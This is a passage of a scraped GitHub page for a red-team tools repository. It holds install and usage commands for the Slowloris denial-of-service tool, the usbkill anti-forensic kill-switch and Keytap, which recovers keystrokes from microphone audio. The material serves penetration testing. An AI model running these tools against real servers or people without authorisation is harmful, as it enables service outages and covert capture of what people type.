1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">Slowloris is a type of denial-of-service (DoS) attack that involves sending HTTP requests to a web server in a way that ties up the server's resources, preventing it from being able to process legitimate requests.</p> <p dir="auto">This attack would typically be conducted with a botnet, it is designed to be difficult to detect and mitigate, as it uses a relatively small number of connections and does not generate a large amount of traffic.</p> <p dir="auto"><strong>Install: (Pip)</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="sudo pip3 install slowloris"><pre>sudo pip3 install slowloris</pre></div> <p dir="auto"><strong>Install: (Git)</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="git clone https://github.com/gkbrk/slowloris.git cd slowloris"><pre>git clone https://github.com/gkbrk/slowloris.git <span class="pl-c1">cd</span> slowloris</pre></div> <p dir="auto"><strong>Usage:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="# Pip slowloris example.comr # Git python3 slowloris.py example.com"><pre><span class="pl-c"><span class="pl-c">#</span> Pip</span> slowloris example.comr <span class="pl-c"><span class="pl-c">#</span> Git</span> python3 slowloris.py example.com</pre></div> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/210115630-b6541ee0-ad82-471a-9a7e-7f0ec028c67d.png"><img src="https://user-images.githubusercontent.com/100603074/210115630-b6541ee0-ad82-471a-9a7e-7f0ec028c67d.png" alt="image" style="max-width: 100%;"></a></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/hephaest0s/usbkill">usbkill</a></h3><a id="user-content-usbkill" class="anchor" aria-label="Permalink: 🔙usbkill" href="#usbkill"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">This is an anti-forensic kill-switch that waits for a change in USB port status, immediately shutting down endpoint if a change is detected.</p> <p dir="auto">In some situations, it is imperative that no data is added or removed from an endpoint via USB.</p> <p dir="auto">This is where USBkill comes in.</p> <p dir="auto"><strong>Install:</strong></p> <div class="snippet-clipboard-content notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="git clone https://github.com/hephaest0s/usbkill cd usbkill ./setup.py install"><pre class="notranslate"><code>git clone https://github.com/hephaest0s/usbkill cd usbkill ./setup.py install </code></pre></div> <p dir="auto"><strong>Usage:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="sudo python3 usbkill.py"><pre>sudo python3 usbkill.py</pre></div> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/217654429-98efef6d-b70f-48b8-8979-228ce2f78932.png"><img src="https://user-images.githubusercontent.com/100603074/217654429-98efef6d-b70f-48b8-8979-228ce2f78932.png" alt="image" style="max-width: 100%;"></a></p> <p dir="auto"><em>Image used from <a href="https://en.wikipedia.org/wiki/USBKill" rel="nofollow">https://en.wikipedia.org/wiki/USBKill</a></em></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/ggerganov/kbd-audio">Keytap</a></h3><a id="user-content-keytap" class="anchor" aria-label="Permalink: 🔙Keytap" href="#keytap"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">This is a tool that can guess the pressed keyboard keys from the audio of a computer's microphone.</p> <p dir="auto">Keytap2 can also be used to retrieve text from audio snippets of keyboard typing.</p> <p dir="auto"><strong>Install: (Build)</strong></p> <div class="snippet-clipboard-content notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="git clone https://github.com/ggerganov/kbd-audio cd kbd-audio git submodule update --init mkdir build && cd build cmake .. make"><pre class="notranslate"><code>git clone https://github.com/ggerganov/kbd-audio cd kbd-audio git submodule update --init mkdir build && cd build cmake .. make </code></pre></div> <p dir="auto"><strong>Usage:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="# Record audio to a raw binary file on disk ./record-full output.kbd [-cN] # Playback a recording captured via the record-full tool ./play-full input.kbd [-pN] # Record audio only while typing (Useful for collecting training data for keytap) ./record output.kbd [-cN] [-CN]"><pre><span class="pl-c"><span class="pl-c">#</span> Record audio to a raw binary file on disk</span> ./record-full output.kbd [-cN] <span class="pl-c"><span class="pl-c">#</span> Playback a recording captured via the record-full tool</span> ./play-full input.kbd [-pN] <span class="pl-c"><span class="pl-c">#</span> Record audio only while typing (Useful for collecting training data for keytap)</span> ./record output.kbd [-cN] [-CN]</pre></div> <p dir="auto">See full usage documentation <a href="https://github.com/ggerganov/kbd-audio#tool-details">here</a>.</p> <p dir="auto">Try the online demo at <a href="https://keytap.ggerganov.com/" rel="nofollow">https://keytap.ggerganov.com/</a>.</p> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/229649861-728e7ebb-ddb9-4347-9934-dd077d12bb41.png"><img src="https://user-images.githubusercontent.com/100603074/229649861-728e7ebb-ddb9-4347-9934-dd077d12bb41.png" alt="image" style="max-width: 100%;"></a></p> <p dir="auto"><em>Image used from <a href="https://github.com/ggerganov/kbd-audio">https://github.com/ggerganov/kbd-audio</a></em></p> </article></div></div></div></div></div> <!-- --> <!-- --> <script type="application/json" id="__PRIMER_DATA_:R0:__">{"resolvedServerColorMode":"day"}</script></div> </react-partial> <input type="hidden" data-csrf="true" value="C+d+6Mq6269lVRGHzdDbeODAl/tx9Wp5Ojo76I7BwBaWHzWvpPa8t9EkG4Td/JL1wEhwbwKrmcsa2rW/iD9Z8A==" /> </div> <div data-view-component="true" class="Layout-sidebar"> <div class="BorderGrid about-margin" data-pjax> <div class="BorderGrid-row"> <div class="BorderGrid-cell"> <div class="hide-sm hide-md"> <h2 class="mb-3 h4">About</h2> <p class="f4 my-3"> Tools and Techniques for Red Team / Penetration Testing </p> <h3 class="sr-only">Topics</h3> <div class="my-3"> <div class="f6"> <a href="/topics/windows" title="Topic: windows" data-view-component="true" class="topic-tag topic-tag-link"> windows </a> <a href="/topics/linux" title="Topic: linux" data-view-component="true" class="topic-tag topic-tag-link"> linux </a> <a href="/topics/tools" title="Topic: tools" data-view-component="true" class="topic-tag topic-tag-link"> tools </a> <a href="/topics/hacking" title="Topic: hacking" data-view-component="true" class="topic-tag topic-tag-link"> hacking </a> <a href="/topics/resources" title="Topic: resources" data-view-component="true" class="topic-tag topic-tag-link"> resources </a> <a href="/topics/cheatsheet" title="Topic: cheatsheet" data-view-component="true" class="topic-tag topic-tag-link"> cheatsheet </a> <a href="/topics/cybersecurity" title="Topic: cybersecurity" data-view-component="true" class="topic-tag topic-tag-link"> cybersecurity </a> <a href="/topics/enumeration" title="Topic: enumeration" data-view-component="true" class="topic-tag topic-tag-link"> enumeration </a> <a href="/topics/penetration-testing" title="Topic: penetration-testing" data-view-component="true" class="topic-tag topic-tag-link"> penetration-testing </a> <a href="/topics/pentest" title="Topic: pentest" data-view-component="true" class="topic-tag topic-tag-link"> pentest </a> <a href="/topics/payload" title="Topic: payload" data-view-component="true" class="topic-tag topic-tag-link"> payload </a> <a href="/topics/red-team" title="Topic: red-team" data-view-component="true" class="topic-tag topic-tag-link"> red-team </a> <a href="/topics/security-tools" title="Topic: security-tools" data-view-component="true" class="topic-tag topic-tag-link"> security-tools </a> <a href="/topics/redteam" title="Topic: redteam" data-view-component="true" class="topic-tag topic-tag-link"> redteam </a> <a href="/topics/mitre-attack" title="Topic: mitre-attack" data-view-component="true" class="topic-tag topic-tag-link"> mitre-attack </a> <a href="/topics/pentest-tools" title="Topic: pentest-tools" data-view-component="true" class="topic-tag topic-tag-link"> pentest-tools </a> <a href="/topics/red-team-tools" title="Topic: red-team-tools" data-view-component="true" class="topic-tag topic-tag-link"> red-team-tools </a> </div> </div> <h3 class="sr-only">Resources</h3> <div class="mt-2"> <a class="Link--muted" data-analytics-event="{"category":"Repository Overview","action":"click","label":"location:sidebar;file:readme"}" href="#readme-ov-file"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-book mr-2"> <path d="M0 1.75A.75.75 0 0 1 .75 1h4.253c1.227 0 2.317.59 3 1.501A3.743 3.743 0 0 1 11.006 1h4.245a.75.75 0 0 1 .75.75v10.5a.75.75 0 0 1-.75.75h-4.507a2.25 2.25 0 0 0-1.591.659l-.622.621a.75.75 0 0 1-1.06 0l-.622-.621A2.25 2.25 0 0 0 5.258 13H.75a.75.75 0 0 1-.75-.75Zm7.251 10.324.004-5.073-.002-2.253A2.25 2.25 0 0 0 5.003 2.5H1.5v9h3.757a3.75 3.75 0 0 1 1.994.574ZM8.755 4.75l-.004 7.322a3.752 3.752 0 0 1 1.992-.572H14.5v-9h-3.495a2.25 2.25 0 0 0-2.25 2.25Z"></path> </svg> Readme </a> </div> <include-fragment src="/A-poc/RedTeam-Tools/hovercards/citation/sidebar_partial?tree_name=main"> </include-fragment> <div class="mt-2"> <a href="/A-poc/RedTeam-Tools/activity" data-view-component="true" class="Link Link--muted"><svg text="gray" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-pulse mr-2"> <path d="M6 2c.306 0 .582.187.696.471L10 10.731l1.304-3.26A.751.751 0 0 1 12 7h3.25a.75.75 0 0 1 0 1.5h-2.742l-1.812 4.528a.751.751 0 0 1-1.392 0L6 4.77 4.696 8.03A.75.75 0 0 1 4 8.5H.75a.75.75 0 0 1 0-1.5h2.742l1.812-4.529A.751.751 0 0 1 6 2Z"></path> </svg> <span class="color-fg-muted">Activity</span></a> </div> <h3 class="sr-only">Stars</h3> <div class="mt-2"> <a href="/A-poc/RedTeam-Tools/stargazers" data-view-component="true" class="Link Link--muted"><svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-star mr-2"> <path d="M8 .25a.75.75 0 0 1 .673.418l1.882 3.815 4.21.612a.75.75 0 0 1 .416 1.279l-3.046 2.97.719 4.192a.751.751 0 0 1-1.088.791L8 12.347l-3.766 1.98a.75.75 0 0 1-1.088-.79l.72-4.194L.818 6.374a.75.75 0 0 1 .416-1.28l4.21-.611L7.327.668A.75.75 0 0 1 8 .25Zm0 2.445L6.615 5.5a.75.75 0 0 1-.564.41l-3.097.45 2.24 2.184a.75.75 0 0 1 .216.664l-.528 3.084 2.769-1.456a.75.75 0 0 1 .698 0l2.77 1.456-.53-3.084a.75.75 0 0 1 .216-.664l2.24-2.183-3.096-.45a.75.75 0 0 1-.564-.41L8 2.694Z"></path> </svg> <strong>6.4k</strong> stars</a> </div> <h3 class="sr-only">Watchers</h3> <div class="mt-2"> <a href="/A-poc/RedTeam-Tools/watchers" data-view-component="true" class="Link Link--muted"><svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-eye mr-2"> <path d="M8 2c1.981 0 3.671.992 4.933 2.078 1.27 1.091 2.187 2.345 2.637 3.023a1.62 1.62 0 0 1 0 1.798c-.45.678-1.367 1.932-2.637 3.023C11.67 13.008 9.981 14 8 14c-1.981 0-3.671-.992-4.933-2.078C1.797 10.83.88 9.576.43 8.898a1.62 1.62 0 0 1 0-1.798c.45-.677 1.367-1.931 2.637-3.022C4.33 2.992 6.019 2 8 2ZM1.679 7.932a.12.12 0 0 0 0 .136c.411.622 1.241 1.75 2.366 2.717C5.176 11.758 6.527 12.5 8 12.5c1.473 0 2.825-.742 3.955-1.715 1.124-.967 1.954-2.096 2.366-2.717a.12.12 0 0 0 0-.136c-.412-.621-1.242-1.75-2.366-2.717C10.824 4.242 9.473 3.5 8 3.5c-1.473 0-2.825.742-3.955 1.715-1.124.967-1.954 2.096-2.366 2.717ZM8 10a2 2 0 1 1-.001-3.999A2 2 0 0 1 8 10Z"></path> </svg> <strong>110</strong> watching</a> </div> <h3 class="sr-only">Forks</h3> <div class="mt-2"> <a href="/A-poc/RedTeam-Tools/forks" data-view-component="true" class="Link Link--muted"><svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo-forked mr-2"> <path d="M5 5.372v.878c0 .414.336.75.75.75h4.5a.75.75 0 0 0 .75-.75v-.878a2.25 2.25 0 1 1 1.5 0v.878a2.25 2.25 0 0 1-2.25 2.25h-1.5v2.128a2.251 2.251 0 1 1-1.5 0V8.5h-1.5A2.25 2.25 0 0 1 3.5 6.25v-.878a2.25 2.25 0 1 1 1.5 0ZM5 3.25a.75.75 0 1 0-1.5 0 .75.75 0 0 0 1.5 0Zm6.75.75a.75.75 0 1 0 0-1.5.75.75 0 0 0 0 1.5Zm-3 8.75a.75.75 0 1 0-1.5 0 .75.75 0 0 0 1.5 0Z"></path> </svg> <strong>875</strong> forks</a> </div> <div class="mt-2"> <a class="Link--muted" href="/contact/report-content?content_url=https%3A%2F%2Fgithub.com%2FA-poc%2FRedTeam-Tools&report=A-poc+%28user%29"> Report repository </a> </div> </div> </div> </div> <div class="BorderGrid-row" hidden> <div class="BorderGrid-cell"> <include-fragment src="/A-poc/RedTeam-Tools/used_by_list" accept="text/fragment+html"> </include-fragment> </div> </div> </div> </div> </div></div> </div> </div> </turbo-frame> </main> </div> </div> <footer class="footer pt-8 pb-6 f6 color-fg-muted p-responsive" role="contentinfo" > <h2 class='sr-only'>Footer</h2> <div class="d-flex flex-justify-center flex-items-center flex-column-reverse flex-lg-row flex-wrap flex-lg-nowrap"> <div class="d-flex flex-items-center flex-shrink-0 mx-2"> <a aria-label="Homepage" title="GitHub" class="footer-octicon mr-2" href="https://github.com"> <svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-mark-github"> <path d="M12 1C5.9225 1 1 5.9225 1 12C1 16.8675 4.14875 20.9787 8.52125 22.4362C9.07125 22.5325 9.2775 22.2025 9.2775 21.9137C9.2775 21.6525 9.26375 20.7862 9.26375 19.865C6.5 20.3737 5.785 19.1912 5.565 18.5725C5.44125 18.2562 4.905 17.28 4.4375 17.0187C4.0525 16.8125 3.5025 16.3037 4.42375 16.29C5.29 16.2762 5.90875 17.0875 6.115 17.4175C7.105 19.0812 8.68625 18.6137 9.31875 18.325C9.415 17.61 9.70375 17.1287 10.02 16.8537C7.5725 16.5787 5.015 15.63 5.015 11.4225C5.015 10.2262 5.44125 9.23625 6.1425 8.46625C6.0325 8.19125 5.6475 7.06375 6.2525 5.55125C6.2525 5.55125 7.17375 5.2625 9.2775 6.67875C10.1575 6.43125 11.0925 6.3075 12.0275 6.3075C12.9625 6.3075 13.8975 6.43125 14.7775 6.67875C16.8813 5.24875 17.8025 5.55125 17.8025 5.55125C18.4075 7.06375 18.0225 8.19125 17.9125 8.46625C18.6138 9.23625 19.04 10.2125 19.04 11.4225C19.04 15.6437 16.4688 16.5787 14.0213 16.8537C14.42 17.1975 14.7638 17.8575 14.7638 18.8887C14.7638 20.36 14.75 21.5425 14.75 21.9137C14.75 22.2025 14.9563 22.5462 15.5063 22.4362C19.8513 20.9787 23 16.8537 23 12C23 5.9225 18.0775 1 12 1Z"></path> </svg> </a> <span> © 2025 GitHub, Inc. </span> </div> <nav aria-label="Footer"> <h3 class="sr-only" id="sr-footer-heading">Footer navigation</h3> <ul class="list-style-none d-flex flex-justify-center flex-wrap mb-2 mb-lg-0" aria-labelledby="sr-footer-heading"> <li class="mx-2"> <a data-analytics-event="{"category":"Footer","action":"go to Terms","label":"text:terms"}" href="https://docs.github.com/site-policy/github-terms/github-terms-of-service" data-view-component="true" class="Link--secondary Link">Terms</a> </li> <li class="mx-2"> <a data-analytics-event="{"category":"Footer","action":"go to privacy","label":"text:privacy"}" href="https://docs.github.com/site-policy/privacy-policies/github-privacy-statement" data-view-component="true" class="Link--secondary Link">Privacy</a> </li> <li class="mx-2"> <a data-analytics-event="{"category":"Footer","action":"go to security","label":"text:security"}" href="https://github.com/security" data-view-component="true" class="Link--secondary Link">Security</a> </li> <li class="mx-2"> <a data-analytics-event="{"category":"Footer","action":"go to status","label":"text:status"}" href="https://www.githubstatus.com/" data-view-component="true" class="Link--secondary Link">Status</a> </li> <li class="mx-2"> <a data-analytics-event="{"category":"Footer","action":"go to docs","label":"text:docs"}" href="https://docs.github.com/" data-view-component="true" class="Link--secondary Link">Docs</a> </li> <li class="mx-2"> <a data-analytics-event="{"category":"Footer","action":"go to contact","label":"text:contact"}" href="https://support.github.com?tags=dotcom-footer" data-view-component="true" class="Link--secondary Link">Contact</a> </li> <li class="mx-2" > <cookie-consent-link> <button type="button" class="Link--secondary underline-on-hover border-0 p-0 color-bg-transparent" data-action="click:cookie-consent-link#showConsentManagement" data-analytics-event="{"location":"footer","action":"cookies","context":"subfooter","tag":"link","label":"cookies_link_subfooter_footer"}" > Manage cookies </button> </cookie-consent-link> </li> <li class="mx-2"> <cookie-consent-link> <button type="button" class="Link--secondary underline-on-hover border-0 p-0 color-bg-transparent" data-action="click:cookie-consent-link#showConsentManagement" data-analytics-event="{"location":"footer","action":"dont_share_info","context":"subfooter","tag":"link","label":"dont_share_info_link_subfooter_footer"}" > Do not share my personal information </button> </cookie-consent-link> </li> </ul> </nav> </div> </footer> <ghcc-consent id="ghcc" class="position-fixed bottom-0 left-0" style="z-index: 999999" data-initial-cookie-consent-allowed="" data-cookie-consent-required="false"></ghcc-consent> <div id="ajax-error-message" class="ajax-error-message flash flash-error" hidden> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert"> <path d="M6.457 1.047c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0 1 14.082 15H1.918a1.75 1.75 0 0 1-1.543-2.575Zm1.763.707a.25.25 0 0 0-.44 0L1.698 13.132a.25.25 0 0 0 .22.368h12.164a.25.25 0 0 0 .22-.368Zm.53 3.996v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 1.5 0ZM9 11a1 1 0 1 1-2 0 1 1 0 0 1 2 0Z"></path> </svg> <button type="button" class="flash-close js-ajax-error-dismiss" aria-label="Dismiss error"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path> </svg> </button> You can’t perform that action at this time. </div> <template id="site-details-dialog"> <details class="details-reset details-overlay details-overlay-dark lh-default color-fg-default hx_rsm" open> <summary role="button" aria-label="Close dialog"></summary> <details-dialog class="Box Box--overlay d-flex flex-column anim-fade-in fast hx_rsm-dialog hx_rsm-modal"> <button class="Box-btn-octicon m-0 btn-octicon position-absolute right-0 top-0" type="button" aria-label="Close dialog" data-close-dialog> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path> </svg> </button> <div class="octocat-spinner my-6 js-details-dialog-spinner"></div> </details-dialog> </details> </template> <div class="Popover js-hovercard-content position-absolute" style="display: none; outline: none;"> <div class="Popover-message Popover-message--bottom-left Popover-message--large Box color-shadow-large" style="width:360px;"> </div> </div> <template id="snippet-clipboard-copy-button"> <div class="zeroclipboard-container position-absolute right-0 top-0"> <clipboard-copy aria-label="Copy" class="ClipboardButton btn js-clipboard-copy m-2 p-0" data-copy-feedback="Copied!" data-tooltip-direction="w"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-copy js-clipboard-copy-icon m-2"> <path d="M0 6.75C0 5.784.784 5 1.75 5h1.5a.75.75 0 0 1 0 1.5h-1.5a.25.25 0 0 0-.25.25v7.5c0 .138.112.25.25.25h7.5a.25.25 0 0 0 .25-.25v-1.5a.75.75 0 0 1 1.5 0v1.5A1.75 1.75 0 0 1 9.25 16h-7.5A1.75 1.75 0 0 1 0 14.25Z"></path><path d="M5 1.75C5 .784 5.784 0 6.75 0h7.5C15.216 0 16 .784 16 1.75v7.5A1.75 1.75 0 0 1 14.25 11h-7.5A1.75 1.75 0 0 1 5 9.25Zm1.75-.25a.25.25 0 0 0-.25.25v7.5c0 .138.112.25.25.25h7.5a.25.25 0 0 0 .25-.25v-7.5a.25.25 0 0 0-.25-.25Z"></path> </svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check js-clipboard-check-icon color-fg-success d-none m-2"> <path d="M13.78 4.22a.75.75 0 0 1 0 1.06l-7.25 7.25a.75.75 0 0 1-1.06 0L2.22 9.28a.751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018L6 10.94l6.72-6.72a.75.75 0 0 1 1.06 0Z"></path> </svg> </clipboard-copy> </div> </template> <template id="snippet-clipboard-copy-button-unpositioned"> <div class="zeroclipboard-container"> <clipboard-copy aria-label="Copy" class="ClipboardButton btn btn-invisible js-clipboard-copy m-2 p-0 d-flex flex-justify-center flex-items-center" data-copy-feedback="Copied!" data-tooltip-direction="w"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-copy js-clipboard-copy-icon"> <path d="M0 6.75C0 5.784.784 5 1.75 5h1.5a.75.75 0 0 1 0 1.5h-1.5a.25.25 0 0 0-.25.25v7.5c0 .138.112.25.25.25h7.5a.25.25 0 0 0 .25-.25v-1.5a.75.75 0 0 1 1.5 0v1.5A1.75 1.75 0 0 1 9.25 16h-7.5A1.75 1.75 0 0 1 0 14.25Z"></path><path d="M5 1.75C5 .784 5.784 0 6.75 0h7.5C15.216 0 16 .784 16 1.75v7.5A1.75 1.75 0 0 1 14.25 11h-7.5A1.75 1.75 0 0 1 5 9.25Zm1.75-.25a.25.25 0 0 0-.25.25v7.5c0 .138.112.25.25.25h7.5a.25.25 0 0 0 .25-.25v-7.5a.25.25 0 0 0-.25-.25Z"></path> </svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check js-clipboard-check-icon color-fg-success d-none"> <path d="M13.78 4.22a.75.75 0 0 1 0 1.06l-7.25 7.25a.75.75 0 0 1-1.06 0L2.22 9.28a.751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018L6 10.94l6.72-6.72a.75.75 0 0 1 1.06 0Z"></path> </svg> </clipboard-copy> </div> </template> </div> <div id="js-global-screen-reader-notice" class="sr-only mt-n1" aria-live="polite" aria-atomic="true" ></div> <div id="js-global-screen-reader-notice-assertive" class="sr-only mt-n1" aria-live="assertive" aria-atomic="true"></div> </body> </html>